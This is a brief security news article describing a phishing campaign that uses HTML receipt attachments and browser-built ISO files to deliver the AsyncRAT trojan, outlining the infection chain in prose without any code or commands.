Last Updated on 27/01/2022 by Nidhi Khandelwal
As part of a malware campaign that began in September 2021, a new, sophisticated phishing assault has been identified that delivers the AsyncRAT trojan.
The attacks start with an email message that contains an HTML attachment that looks like an order confirmation receipt (for example, Receipt-digits>.html). When the mail receiver opens the decoy file, they are directed to a web page that asks them to save an ISO file.
Unlike past RAT campaigns that direct victims to a phishing URL set up specifically for downloading the next-stage malware, the latest RAT campaign smartly leverages JavaScript to construct the ISO file locally from a Base64-encoded text and imitate the download process.
“A JavaScript code hidden inside the HTML receipt file generates the ISO download from within the victim’s browser, not from a distant server,” Dereviashkin added.
When the victim accesses the ISO file, it is mounted as a DVD Drive on the Windows host and contains either a.BAT or a.VBS file that continues the infection chain by executing a PowerShell command to fetch a next-stage component.
This causes a.NET module to be executed in memory, which then functions as a dropper for three files, each of which acts as a trigger for the next, to deliver AsyncRAT as the final payload, while also scanning for antivirus protection and setting up Windows Defender exclusions.
